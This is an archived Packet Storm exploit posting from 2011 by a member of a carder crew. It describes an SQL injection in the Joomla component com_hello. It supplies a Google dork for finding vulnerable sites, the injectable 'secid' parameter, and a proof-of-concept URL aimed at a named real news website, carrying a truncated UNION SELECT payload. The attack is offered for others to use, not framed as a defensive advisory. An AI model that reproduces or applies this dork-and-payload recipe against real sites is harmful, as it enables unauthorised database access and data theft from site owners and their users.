Joomla Hello SQL Injection

2011-05-10T00:00:00
ID PACKETSTORM:101251
Type packetstorm
Reporter g3mbeLz_YCL
Modified 2011-05-10T00:00:00

Description

                                        
                                            ` ) ) ) ( ( ( ( ( ) )   
( /(( /( ( ( /( ( ( ( )\ ))\ ) )\ ))\ ) )\ ) ( /( ( /(   
)\())\()))\ ) )\()) )\ )\ )\ (()/(()/( ( (()/(()/((()/( )\()) )\())   
((_)((_)\(()/( ((_)((((_)( (((_)(((_)( /(_))(_)) )\ /(_))(_))/(_))(_)\|((_)\   
__ ((_)((_)/(_))___ ((_)\ _ )\ )\___)\ _ )\(_))(_))_ ((_)(_))(_)) (_)) _((_)_ ((_)   
\ \ / / _ (_)) __\ \ / (_)_\(_)(/ __(_)_\(_) _ \| \| __| _ \ | |_ _|| \| | |/ /   
\ V / (_) || (_ |\ V / / _ \ | (__ / _ \ | /| |) | _|| / |__ | | | .` | ' <   
|_| \___/ \___| |_| /_/ \_\ \___/_/ \_\|_|_\|___/|___|_|_\____|___||_|\_|_|\_\   
.WEB.ID   
-----------------------------------------------------------------------   
Joomla Component com_hello SQL Injection Vulnerability   
-----------------------------------------------------------------------   
Author : g3mbeLz_YCL   
Site : www.yogyacarderlink.web.id   
Date : Mei, 09 2011.   
Location : Yogyakarta, Indonesia.   
Time Zone : GMT +6:00   
Dork Google: inurl:"com_hello"   
  
[x] X.P.L:   
../public_html/index.php?option=com_hello&view=hello&catid=74&secid=[SQLi] <--- Your Skill...!!!   
  
- P.O.C:   
http://www.southasiamonitor.org/index.php?option=com_hello&view=hello&catid=74&secid=5+AND+1=2+UNION+SELE  
  
- Shouts & Greetz:   
All YOGYACARDERLINK CREW...!!!   
I Love You... :-)   
  
[x] Bugs Found By: g3mbeLz_YCL   
  
`